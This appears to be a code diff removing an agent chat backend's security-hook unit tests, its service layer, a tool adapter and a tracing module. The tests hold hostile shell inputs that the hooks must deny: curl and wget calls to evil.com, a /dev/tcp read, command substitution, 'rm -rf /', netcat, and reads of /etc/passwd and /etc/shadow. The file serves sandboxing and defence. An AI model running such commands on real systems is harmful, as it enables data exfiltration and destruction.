"PostToolUseFailure": [
HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
],
"PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
}
except ImportError:
# Fallback for when SDK isn't available - return empty hooks
logger.warning("claude-agent-sdk not available, security hooks disabled")
return {}

View File

@@ -1,258 +0,0 @@
"""Unit tests for SDK security hooks."""
import os
from .security_hooks import _validate_tool_access, _validate_user_isolation
SDK_CWD = "/tmp/copilot-abc123"
def _is_denied(result: dict) -> bool:
hook = result.get("hookSpecificOutput", {})
return hook.get("permissionDecision") == "deny"
# -- Blocked tools -----------------------------------------------------------
def test_blocked_tools_denied():
for tool in ("bash", "shell", "exec", "terminal", "command"):
result = _validate_tool_access(tool, {})
assert _is_denied(result), f"{tool} should be blocked"
def test_unknown_tool_allowed():
result = _validate_tool_access("SomeCustomTool", {})
assert result == {}
# -- Workspace-scoped tools --------------------------------------------------
def test_read_within_workspace_allowed():
result = _validate_tool_access(
"Read", {"file_path": f"{SDK_CWD}/file.txt"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_write_within_workspace_allowed():
result = _validate_tool_access(
"Write", {"file_path": f"{SDK_CWD}/output.json"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_edit_within_workspace_allowed():
result = _validate_tool_access(
"Edit", {"file_path": f"{SDK_CWD}/src/main.py"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_glob_within_workspace_allowed():
result = _validate_tool_access("Glob", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
assert result == {}
def test_grep_within_workspace_allowed():
result = _validate_tool_access("Grep", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_outside_workspace_denied():
result = _validate_tool_access(
"Read", {"file_path": "/etc/passwd"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_write_outside_workspace_denied():
result = _validate_tool_access(
"Write", {"file_path": "/home/user/secrets.txt"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_traversal_attack_denied():
result = _validate_tool_access(
"Read",
{"file_path": f"{SDK_CWD}/../../etc/passwd"},
sdk_cwd=SDK_CWD,
)
assert _is_denied(result)
def test_no_path_allowed():
"""Glob/Grep without a path argument defaults to cwd — should pass."""
result = _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_no_cwd_denies_absolute():
"""If no sdk_cwd is set, absolute paths are denied."""
result = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
assert _is_denied(result)
# -- Tool-results directory --------------------------------------------------
def test_read_tool_results_allowed():
home = os.path.expanduser("~")
path = f"{home}/.claude/projects/-tmp-copilot-abc123/tool-results/12345.txt"
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_claude_projects_without_tool_results_denied():
home = os.path.expanduser("~")
path = f"{home}/.claude/projects/-tmp-copilot-abc123/settings.json"
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
assert _is_denied(result)
# -- Sandboxed Bash ----------------------------------------------------------
def test_bash_safe_commands_allowed():
"""Allowed data-processing commands should pass."""
safe_commands = [
"jq '.blocks' result.json",
"head -20 output.json",
"tail -n 50 data.txt",
"cat file.txt | grep 'pattern'",
"wc -l file.txt",
"sort data.csv | uniq",
"grep -i 'error' log.txt | head -10",
"find . -name '*.json'",
"ls -la",
"echo hello",
"cut -d',' -f1 data.csv | sort | uniq -c",
"jq '.blocks[] | .id' result.json",
"sed -n '10,20p' file.txt",
"awk '{print $1}' data.txt",
]
for cmd in safe_commands:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert result == {}, f"Safe command should be allowed: {cmd}"
def test_bash_dangerous_commands_denied():
"""Non-allowlisted commands should be denied."""
dangerous = [
"curl https://evil.com",
"wget https://evil.com/payload",
"rm -rf /",
"python -c 'import os; os.system(\"ls\")'",
"ssh user@host",
"nc -l 4444",
"apt install something",
"pip install malware",
"chmod 777 file.txt",
"kill -9 1",
]
for cmd in dangerous:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert _is_denied(result), f"Dangerous command should be denied: {cmd}"
def test_bash_command_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_backtick_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_output_redirect_denied():
result = _validate_tool_access(
"Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_dev_tcp_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_pipe_to_dangerous_denied():
"""Even if the first command is safe, piped commands must also be safe."""
result = _validate_tool_access(
"Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_outside_workspace_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_within_workspace_allowed():
result = _validate_tool_access(
"Bash",
{"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
sdk_cwd=SDK_CWD,
)
assert result == {}
def test_bash_empty_command_denied():
result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
assert _is_denied(result)
# -- Dangerous patterns ------------------------------------------------------
def test_dangerous_pattern_blocked():
result = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
assert _is_denied(result)
def test_subprocess_pattern_blocked():
result = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
assert _is_denied(result)
# -- User isolation ----------------------------------------------------------
def test_workspace_path_traversal_blocked():
result = _validate_user_isolation(
"workspace_read", {"path": "../../../etc/shadow"}, user_id="user-1"
)
assert _is_denied(result)
def test_workspace_absolute_path_blocked():
result = _validate_user_isolation(
"workspace_read", {"path": "/etc/passwd"}, user_id="user-1"
)
assert _is_denied(result)
def test_workspace_normal_path_allowed():
result = _validate_user_isolation(
"workspace_read", {"path": "src/main.py"}, user_id="user-1"
)
assert result == {}
def test_non_workspace_tool_passes_isolation():
result = _validate_user_isolation(
"find_agent", {"query": "email"}, user_id="user-1"
)
assert result == {}

View File

@@ -1,556 +0,0 @@
"""Claude Agent SDK service layer for CoPilot chat completions."""
import asyncio
import json
import logging
import os
import re
import uuid
from collections.abc import AsyncGenerator
from typing import Any
from backend.util.exceptions import NotFoundError
from ..config import ChatConfig
from ..model import (
ChatMessage,
ChatSession,
Usage,
get_chat_session,
update_session_title,
upsert_chat_session,
)
from ..response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamStart,
StreamTextDelta,
StreamToolInputAvailable,
StreamToolOutputAvailable,
StreamUsage,
)
from ..service import _build_system_prompt, _generate_session_title
from ..tracking import track_user_message
from .anthropic_fallback import stream_with_anthropic
from .response_adapter import SDKResponseAdapter
from .security_hooks import create_security_hooks
from .tool_adapter import (
COPILOT_TOOL_NAMES,
create_copilot_mcp_server,
set_execution_context,
)
from .tracing import TracedSession, create_tracing_hooks, merge_hooks
logger = logging.getLogger(__name__)
config = ChatConfig()
# Set to hold background tasks to prevent garbage collection
_background_tasks: set[asyncio.Task[Any]] = set()
_SDK_CWD_PREFIX = "/tmp/copilot-"
# Appended to the system prompt to inform the agent about Bash restrictions.
# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
# but it doesn't know about our security hooks' command allowlist for Bash.
_SDK_TOOL_SUPPLEMENT = """
## Bash restrictions
The Bash tool is restricted to safe, read-only data-processing commands:
jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
echo, diff, base64, and similar utilities.
Network commands (curl, wget), destructive commands (rm, chmod), and
interpreters (python, node) are NOT available.
"""
def _resolve_sdk_model() -> str | None:
"""Resolve the model name for the Claude Agent SDK CLI.
Uses ``config.claude_agent_model`` if set, otherwise derives from
``config.model`` by stripping the OpenRouter provider prefix (e.g.,
``"anthropic/claude-opus-4.6"`` → ``"claude-opus-4.6"``).
"""
if config.claude_agent_model:
return config.claude_agent_model
model = config.model
if "/" in model:
return model.split("/", 1)[1]
return model
def _build_sdk_env() -> dict[str, str]:
"""Build env vars for the SDK CLI process.
Routes API calls through OpenRouter (or a custom base_url) using
the same ``config.api_key`` / ``config.base_url`` as the non-SDK path.
This gives per-call token and cost tracking on the OpenRouter dashboard.
Only overrides ``ANTHROPIC_API_KEY`` when a valid proxy URL and auth
token are both present — otherwise returns an empty dict so the SDK
falls back to its default credentials.
"""
env: dict[str, str] = {}
if config.api_key and config.base_url:
# Strip /v1 suffix — SDK expects the base URL without a version path
base = config.base_url.rstrip("/")
if base.endswith("/v1"):
base = base[:-3]
if not base or not base.startswith("http"):
# Invalid base_url — don't override SDK defaults
return env
env["ANTHROPIC_BASE_URL"] = base
env["ANTHROPIC_AUTH_TOKEN"] = config.api_key
# Must be explicitly empty so the CLI uses AUTH_TOKEN instead
env["ANTHROPIC_API_KEY"] = ""
return env
def _make_sdk_cwd(session_id: str) -> str:
"""Create a safe, session-specific working directory path.
Sanitizes session_id, then validates the resulting path stays under /tmp/
using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
"""
# Step 1: Sanitize - only allow alphanumeric and hyphens
safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
if not safe_id:
raise ValueError("Session ID is empty after sanitization")
# Step 2: Construct path with known-safe prefix
cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")
# Step 3: Validate the path is still under our prefix (prevent traversal)
if not cwd.startswith(_SDK_CWD_PREFIX):
raise ValueError(f"Session path escaped prefix: {cwd}")
# Step 4: Additional assertion for defense-in-depth
assert cwd.startswith("/tmp/copilot-"), f"Path validation failed: {cwd}"
return cwd
def _cleanup_sdk_tool_results(cwd: str) -> None:
"""Remove SDK tool-result files for a specific session working directory.
The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
We clean only the specific cwd's results to avoid race conditions between
concurrent sessions.
Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
"""
import shutil
# Security check 1: Validate cwd is under the expected prefix
normalized = os.path.normpath(cwd)
if not normalized.startswith(_SDK_CWD_PREFIX):
logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
return
# Security check 2: Ensure no path traversal in the normalized path
if ".." in normalized:
logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
return
# SDK encodes the cwd path by replacing '/' with '-'
encoded_cwd = normalized.replace("/", "-")
# Construct the project directory path (known-safe home expansion)
claude_projects = os.path.expanduser("~/.claude/projects")
project_dir = os.path.join(claude_projects, encoded_cwd)
# Security check 3: Validate project_dir is under ~/.claude/projects
project_dir = os.path.normpath(project_dir)
if not project_dir.startswith(claude_projects):
logger.warning(
f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
)
return
results_dir = os.path.join(project_dir, "tool-results")
if os.path.isdir(results_dir):
for filename in os.listdir(results_dir):
file_path = os.path.join(results_dir, filename)
try:
if os.path.isfile(file_path):
os.remove(file_path)
except OSError:
pass
# Also clean up the temp cwd directory itself
try:
shutil.rmtree(normalized, ignore_errors=True)
except OSError:
pass
async def _compress_conversation_history(
session: ChatSession,
) -> list[ChatMessage]:
"""Compress prior conversation messages if they exceed the token threshold.
Uses the shared compress_context() from prompt.py which supports:
- LLM summarization of old messages (keeps recent ones intact)
- Progressive content truncation as fallback
- Middle-out deletion as last resort
Returns the compressed prior messages (everything except the current message).
"""
prior = session.messages[:-1]
if len(prior) < 2:
return prior
from backend.util.prompt import compress_context
# Convert ChatMessages to dicts for compress_context
messages_dict = []
for msg in prior:
msg_dict: dict[str, Any] = {"role": msg.role}
if msg.content:
msg_dict["content"] = msg.content
if msg.tool_calls:
msg_dict["tool_calls"] = msg.tool_calls
if msg.tool_call_id:
msg_dict["tool_call_id"] = msg.tool_call_id
messages_dict.append(msg_dict)
try:
import openai
async with openai.AsyncOpenAI(
api_key=config.api_key, base_url=config.base_url, timeout=30.0
) as client:
result = await compress_context(
messages=messages_dict,
model=config.model,
client=client,
)
except Exception as e:
logger.warning(f"[SDK] Context compression with LLM failed: {e}")
# Fall back to truncation-only (no LLM summarization)
result = await compress_context(
messages=messages_dict,
model=config.model,
client=None,
)
if result.was_compacted:
logger.info(
f"[SDK] Context compacted: {result.original_token_count} -> "
f"{result.token_count} tokens "
f"({result.messages_summarized} summarized, "
f"{result.messages_dropped} dropped)"
)
# Convert compressed dicts back to ChatMessages
return [
ChatMessage(
role=m["role"],
content=m.get("content"),
tool_calls=m.get("tool_calls"),
tool_call_id=m.get("tool_call_id"),
)
for m in result.messages
]
return prior
def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
"""Format conversation messages into a context prefix for the user message.
Returns a string like:
<conversation_history>
User: hello
You responded: Hi! How can I help?
</conversation_history>
Returns None if there are no messages to format.
"""
if not messages:
return None
lines: list[str] = []
for msg in messages:
if not msg.content:
continue
if msg.role == "user":
lines.append(f"User: {msg.content}")
elif msg.role == "assistant":
lines.append(f"You responded: {msg.content}")
# Skip tool messages — they're internal details
if not lines:
return None
return "<conversation_history>\n" + "\n".join(lines) + "\n</conversation_history>"
async def stream_chat_completion_sdk(
session_id: str,
message: str | None = None,
tool_call_response: str | None = None, # noqa: ARG001
is_user_message: bool = True,
user_id: str | None = None,
retry_count: int = 0, # noqa: ARG001
session: ChatSession | None = None,
context: dict[str, str] | None = None, # noqa: ARG001
) -> AsyncGenerator[StreamBaseResponse, None]:
"""Stream chat completion using Claude Agent SDK.
Drop-in replacement for stream_chat_completion with improved reliability.
"""
if session is None:
session = await get_chat_session(session_id, user_id)
if not session:
raise NotFoundError(
f"Session {session_id} not found. Please create a new session first."
)
if message:
session.messages.append(
ChatMessage(
role="user" if is_user_message else "assistant", content=message
)
)
if is_user_message:
track_user_message(
user_id=user_id, session_id=session_id, message_length=len(message)
)
session = await upsert_chat_session(session)
# Generate title for new sessions (first user message)
if is_user_message and not session.title:
user_messages = [m for m in session.messages if m.role == "user"]
if len(user_messages) == 1:
first_message = user_messages[0].content or message or ""
if first_message:
task = asyncio.create_task(
_update_title_async(session_id, first_message, user_id)
)
_background_tasks.add(task)
task.add_done_callback(_background_tasks.discard)
# Build system prompt (reuses non-SDK path with Langfuse support)
has_history = len(session.messages) > 1
system_prompt, _ = await _build_system_prompt(
user_id, has_conversation_history=has_history
)
system_prompt += _SDK_TOOL_SUPPLEMENT
message_id = str(uuid.uuid4())
text_block_id = str(uuid.uuid4())
task_id = str(uuid.uuid4())
yield StreamStart(messageId=message_id, taskId=task_id)
stream_completed = False
# Use a session-specific temp dir to avoid cleanup race conditions
# between concurrent sessions.
sdk_cwd = _make_sdk_cwd(session_id)
os.makedirs(sdk_cwd, exist_ok=True)
set_execution_context(user_id, session, None)
try:
try:
from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
mcp_server = create_copilot_mcp_server()
sdk_model = _resolve_sdk_model()
# Initialize Langfuse tracing (no-op if not configured)
tracer = TracedSession(session_id, user_id, system_prompt, model=sdk_model)
# Merge security hooks with optional tracing hooks
security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
tracing_hooks = create_tracing_hooks(tracer)
combined_hooks = merge_hooks(security_hooks, tracing_hooks)
options = ClaudeAgentOptions(
system_prompt=system_prompt,
mcp_servers={"copilot": mcp_server}, # type: ignore[arg-type]
allowed_tools=COPILOT_TOOL_NAMES,
hooks=combined_hooks, # type: ignore[arg-type]
cwd=sdk_cwd,
max_buffer_size=config.claude_agent_max_buffer_size,
model=sdk_model,
env=_build_sdk_env(),
user=user_id or None,
max_budget_usd=config.claude_agent_max_budget_usd,
)
adapter = SDKResponseAdapter(message_id=message_id)
adapter.set_task_id(task_id)
async with tracer, ClaudeSDKClient(options=options) as client:
current_message = message or ""
if not current_message and session.messages:
last_user = [m for m in session.messages if m.role == "user"]
if last_user:
current_message = last_user[-1].content or ""
if not current_message.strip():
yield StreamError(
errorText="Message cannot be empty.",
code="empty_prompt",
)
yield StreamFinish()
return
# Build query with conversation history context.
# Compress history first to handle long conversations.
query_message = current_message
if len(session.messages) > 1:
compressed = await _compress_conversation_history(session)
history_context = _format_conversation_context(compressed)
if history_context:
query_message = (
f"{history_context}\n\n"
f"Now, the user says:\n{current_message}"
)
logger.info(
f"[SDK] Sending query: {current_message[:80]!r}"
f" ({len(session.messages)} msgs in session)"
)
tracer.log_user_message(current_message)
await client.query(query_message, session_id=session_id)
assistant_response = ChatMessage(role="assistant", content="")
accumulated_tool_calls: list[dict[str, Any]] = []
has_appended_assistant = False
has_tool_results = False
async for sdk_msg in client.receive_messages():
logger.debug(
f"[SDK] Received: {type(sdk_msg).__name__} "
f"{getattr(sdk_msg, 'subtype', '')}"
)
tracer.log_sdk_message(sdk_msg)
for response in adapter.convert_message(sdk_msg):
if isinstance(response, StreamStart):
continue
yield response
if isinstance(response, StreamTextDelta):
delta = response.delta or ""
# After tool results, start a new assistant
# message for the post-tool text.
if has_tool_results and has_appended_assistant:
assistant_response = ChatMessage(
role="assistant", content=delta
)
accumulated_tool_calls = []
has_appended_assistant = False
has_tool_results = False
session.messages.append(assistant_response)
has_appended_assistant = True
else:
assistant_response.content = (
assistant_response.content or ""
) + delta
if not has_appended_assistant:
session.messages.append(assistant_response)
has_appended_assistant = True
elif isinstance(response, StreamToolInputAvailable):
accumulated_tool_calls.append(
{
"id": response.toolCallId,
"type": "function",
"function": {
"name": response.toolName,
"arguments": json.dumps(response.input or {}),
},
}
)
assistant_response.tool_calls = accumulated_tool_calls
if not has_appended_assistant:
session.messages.append(assistant_response)
has_appended_assistant = True
elif isinstance(response, StreamToolOutputAvailable):
session.messages.append(
ChatMessage(
role="tool",
content=(
response.output
if isinstance(response.output, str)
else str(response.output)
),
tool_call_id=response.toolCallId,
)
)
has_tool_results = True
elif isinstance(response, StreamUsage):
session.usage.append(
Usage(
prompt_tokens=response.promptTokens,
completion_tokens=response.completionTokens,
total_tokens=response.totalTokens,
)
)
elif isinstance(response, StreamFinish):
stream_completed = True
if stream_completed:
break
if (
assistant_response.content or assistant_response.tool_calls
) and not has_appended_assistant:
session.messages.append(assistant_response)
except ImportError:
logger.warning(
"[SDK] claude-agent-sdk not available, using Anthropic fallback"
)
async for response in stream_with_anthropic(
session, system_prompt, text_block_id
):
if isinstance(response, StreamFinish):
stream_completed = True
yield response
await upsert_chat_session(session)
logger.debug(
f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
)
if not stream_completed:
yield StreamFinish()
except Exception as e:
logger.error(f"[SDK] Error: {e}", exc_info=True)
try:
await upsert_chat_session(session)
except Exception as save_err:
logger.error(f"[SDK] Failed to save session on error: {save_err}")
yield StreamError(
errorText="An error occurred. Please try again.",
code="sdk_error",
)
yield StreamFinish()
finally:
_cleanup_sdk_tool_results(sdk_cwd)
async def _update_title_async(
session_id: str, message: str, user_id: str | None = None
) -> None:
"""Background task to update session title."""
try:
title = await _generate_session_title(
message, user_id=user_id, session_id=session_id
)
if title:
await update_session_title(session_id, title)
logger.debug(f"[SDK] Generated title for {session_id}: {title}")
except Exception as e:
logger.warning(f"[SDK] Failed to update session title: {e}")

View File

@@ -1,321 +0,0 @@
"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.
This module provides the adapter layer that converts existing BaseTool implementations
into in-process MCP tools that can be used with the Claude Agent SDK.
"""
import json
import logging
import os
import uuid
from contextvars import ContextVar
from typing import Any
from backend.api.features.chat.model import ChatSession
from backend.api.features.chat.tools import TOOL_REGISTRY
from backend.api.features.chat.tools.base import BaseTool
logger = logging.getLogger(__name__)
# Allowed base directory for the Read tool (SDK saves oversized tool results here)
_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")
# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
MCP_SERVER_NAME = "copilot"
MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"
# Context variables to pass user/session info to tool execution
_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
_current_session: ContextVar[ChatSession | None] = ContextVar(
"current_session", default=None
)
_current_tool_call_id: ContextVar[str | None] = ContextVar(
"current_tool_call_id", default=None
)
# Stash for MCP tool outputs before the SDK potentially truncates them.
# Keyed by tool_name → full output string. Consumed (popped) by the
# response adapter when it builds StreamToolOutputAvailable.
_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
"pending_tool_outputs", default=None # type: ignore[arg-type]
)
def set_execution_context(
user_id: str | None,
session: ChatSession,
tool_call_id: str | None = None,
) -> None:
"""Set the execution context for tool calls.
This must be called before streaming begins to ensure tools have access
to user_id and session information.
"""
_current_user_id.set(user_id)
_current_session.set(session)
_current_tool_call_id.set(tool_call_id)
_pending_tool_outputs.set({})
def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
"""Get the current execution context."""
return (
_current_user_id.get(),
_current_session.get(),
_current_tool_call_id.get(),
)
def pop_pending_tool_output(tool_name: str) -> str | None:
"""Pop and return the stashed full output for *tool_name*.
The SDK CLI may truncate large tool results (writing them to disk and
replacing the content with a file reference). This stash keeps the
original MCP output so the response adapter can forward it to the
frontend for proper widget rendering.
Returns ``None`` if nothing was stashed for *tool_name*.
"""
pending = _pending_tool_outputs.get(None)
if pending is None:
return None
return pending.pop(tool_name, None)
def create_tool_handler(base_tool: BaseTool):
"""Create an async handler function for a BaseTool.
This wraps the existing BaseTool._execute method to be compatible
with the Claude Agent SDK MCP tool format.
"""
async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
"""Execute the wrapped tool and return MCP-formatted response."""
user_id, session, tool_call_id = get_execution_context()
if session is None:
return {
"content": [
{
"type": "text",
"text": json.dumps(
{
"error": "No session context available",
"type": "error",
}
),
}
],
"isError": True,
}
try:
# Call the existing tool's execute method
# Generate unique tool_call_id per invocation for proper correlation
effective_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
result = await base_tool.execute(
user_id=user_id,
session=session,
tool_call_id=effective_id,
**args,
)
# The result is a StreamToolOutputAvailable, extract the output
text = (
result.output
if isinstance(result.output, str)
else json.dumps(result.output)
)
# Stash the full output before the SDK potentially truncates it.
# The response adapter will pop this for frontend widget rendering.
pending = _pending_tool_outputs.get(None)
if pending is not None:
pending[base_tool.name] = text
return {
"content": [{"type": "text", "text": text}],
"isError": not result.success,
}
except Exception as e:
logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
return {
"content": [
{
"type": "text",
"text": json.dumps(
{
"error": str(e),
"type": "error",
"message": f"Failed to execute {base_tool.name}",
}
),
}
],
"isError": True,
}
return tool_handler
def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
"""Build a JSON Schema input schema for a tool."""
return {
"type": "object",
"properties": base_tool.parameters.get("properties", {}),
"required": base_tool.parameters.get("required", []),
}
def get_tool_definitions() -> list[dict[str, Any]]:
"""Get all tool definitions in MCP format.
Returns a list of tool definitions that can be used with
create_sdk_mcp_server or as raw tool definitions.
"""
tool_definitions = []
for tool_name, base_tool in TOOL_REGISTRY.items():
tool_def = {
"name": tool_name,
"description": base_tool.description,
"inputSchema": _build_input_schema(base_tool),
}
tool_definitions.append(tool_def)
return tool_definitions
def get_tool_handlers() -> dict[str, Any]:
"""Get all tool handlers mapped by name.
Returns a dictionary mapping tool names to their handler functions.
"""
handlers = {}
for tool_name, base_tool in TOOL_REGISTRY.items():
handlers[tool_name] = create_tool_handler(base_tool)
return handlers
async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
"""Read a file with optional offset/limit. Restricted to SDK working directory.
After reading, the file is deleted to prevent accumulation in long-running pods.
"""
file_path = args.get("file_path", "")
offset = args.get("offset", 0)
limit = args.get("limit", 2000)
# Security: only allow reads under the SDK's working directory
real_path = os.path.realpath(file_path)
if not real_path.startswith(_SDK_TOOL_RESULTS_DIR):
return {
"content": [{"type": "text", "text": f"Access denied: {file_path}"}],
"isError": True,
}
try:
with open(real_path) as f:
lines = f.readlines()
selected = lines[offset : offset + limit]
content = "".join(selected)
return {"content": [{"type": "text", "text": content}], "isError": False}
except FileNotFoundError:
return {
"content": [{"type": "text", "text": f"File not found: {file_path}"}],
"isError": True,
}
except Exception as e:
return {
"content": [{"type": "text", "text": f"Error reading file: {e}"}],
"isError": True,
}
_READ_TOOL_NAME = "Read"
_READ_TOOL_DESCRIPTION = (
"Read a file from the local filesystem. "
"Use offset and limit to read specific line ranges for large files."
)
_READ_TOOL_SCHEMA = {
"type": "object",
"properties": {
"file_path": {
"type": "string",
"description": "The absolute path to the file to read",
},
"offset": {
"type": "integer",
"description": "Line number to start reading from (0-indexed). Default: 0",
},
"limit": {
"type": "integer",
"description": "Number of lines to read. Default: 2000",
},
},
"required": ["file_path"],
}
# Create the MCP server configuration
def create_copilot_mcp_server():
"""Create an in-process MCP server configuration for CoPilot tools.
This can be passed to ClaudeAgentOptions.mcp_servers.
Note: The actual SDK MCP server creation depends on the claude-agent-sdk
package being available. This function returns the configuration that
can be used with the SDK.
"""
try:
from claude_agent_sdk import create_sdk_mcp_server, tool
# Create decorated tool functions
sdk_tools = []
for tool_name, base_tool in TOOL_REGISTRY.items():
handler = create_tool_handler(base_tool)
decorated = tool(
tool_name,
base_tool.description,
_build_input_schema(base_tool),
)(handler)
sdk_tools.append(decorated)
# Add the Read tool so the SDK can read back oversized tool results
read_tool = tool(
_READ_TOOL_NAME,
_READ_TOOL_DESCRIPTION,
_READ_TOOL_SCHEMA,
)(_read_file_handler)
sdk_tools.append(read_tool)
server = create_sdk_mcp_server(
name=MCP_SERVER_NAME,
version="1.0.0",
tools=sdk_tools,
)
return server
except ImportError:
# Let ImportError propagate so service.py handles the fallback
raise
# SDK built-in tools allowed within the workspace directory.
# Security hooks validate that file paths stay within sdk_cwd
# and that Bash commands are restricted to a safe allowlist.
_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
# List of tool names for allowed_tools configuration
# Include MCP tools, the MCP Read tool for oversized results,
# and SDK built-in file tools for workspace operations.
COPILOT_TOOL_NAMES = [
*[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
*_SDK_BUILTIN_TOOLS,
]

View File

@@ -1,429 +0,0 @@
"""Langfuse tracing integration for Claude Agent SDK.
This module provides modular, non-invasive observability for SDK sessions.
All tracing is opt-in (only active when Langfuse credentials are configured)
and designed to not affect the core execution flow.
Usage:
async with TracedSession(session_id, user_id) as tracer:
# Your SDK code here
tracer.log_user_message(message)
async for sdk_msg in client.receive_messages():
tracer.log_sdk_message(sdk_msg)
tracer.log_result(result_message)
"""
from __future__ import annotations
import logging
import time
from contextlib import asynccontextmanager
from dataclasses import dataclass, field
from typing import TYPE_CHECKING, Any
from backend.util.settings import Settings
if TYPE_CHECKING:
from claude_agent_sdk import Message, ResultMessage
logger = logging.getLogger(__name__)
settings = Settings()
def _is_langfuse_configured() -> bool:
"""Check if Langfuse credentials are configured."""
return bool(
settings.secrets.langfuse_public_key and settings.secrets.langfuse_secret_key
)
@dataclass
class ToolSpan:
"""Tracks a single tool call for tracing."""
tool_call_id: str
tool_name: str
input: dict[str, Any]
start_time: float = field(default_factory=time.perf_counter)
output: str | None = None
success: bool = True
end_time: float | None = None
@dataclass
class GenerationSpan:
"""Tracks an LLM generation (text output) for tracing."""
text: str = ""
start_time: float = field(default_factory=time.perf_counter)
end_time: float | None = None
tool_calls: list[ToolSpan] = field(default_factory=list)
class TracedSession:
"""Context manager for tracing a Claude Agent SDK session with Langfuse.
Automatically creates a trace with:
- Session-level metadata (user_id, session_id)
- Generation spans for LLM outputs
- Tool call spans with input/output
- Token usage and cost (from ResultMessage)
If Langfuse is not configured, all methods are no-ops.
"""
def __init__(
self,
session_id: str,
user_id: str | None = None,
system_prompt: str | None = None,
model: str | None = None,
):
self.session_id = session_id
self.user_id = user_id
self.system_prompt = system_prompt
self.model = model
self.enabled = _is_langfuse_configured()
# Internal state
self._trace: Any = None
self._langfuse: Any = None
self._user_message: str | None = None
self._generations: list[GenerationSpan] = []
self._current_generation: GenerationSpan | None = None
self._pending_tools: dict[str, ToolSpan] = {}
self._start_time: float = 0
async def __aenter__(self) -> TracedSession:
"""Start the trace."""
if not self.enabled:
return self
try:
from langfuse import get_client
self._langfuse = get_client()
self._start_time = time.perf_counter()
# Create the root trace
self._trace = self._langfuse.trace(
name="copilot-sdk-session",
session_id=self.session_id,
user_id=self.user_id,
metadata={
"sdk": "claude-agent-sdk",
"has_system_prompt": bool(self.system_prompt),
},
)
logger.debug(f"[Tracing] Started trace for session {self.session_id}")
except Exception as e:
logger.warning(f"[Tracing] Failed to start trace: {e}")
self.enabled = False
return self
async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
"""End the trace and flush to Langfuse."""
if not self.enabled or not self._trace:
return
try:
# Finalize any open generation
self._finalize_current_generation()
# Add generations as spans
for gen in self._generations:
self._trace.span(
name="llm-generation",
start_time=gen.start_time,
end_time=gen.end_time or time.perf_counter(),
output=gen.text[:1000] if gen.text else None, # Truncate
metadata={"tool_calls": len(gen.tool_calls)},
)
# Add tool calls as nested spans
for tool in gen.tool_calls:
self._trace.span(
name=f"tool:{tool.tool_name}",
start_time=tool.start_time,
end_time=tool.end_time or time.perf_counter(),
input=tool.input,
output=tool.output[:500] if tool.output else None,
metadata={
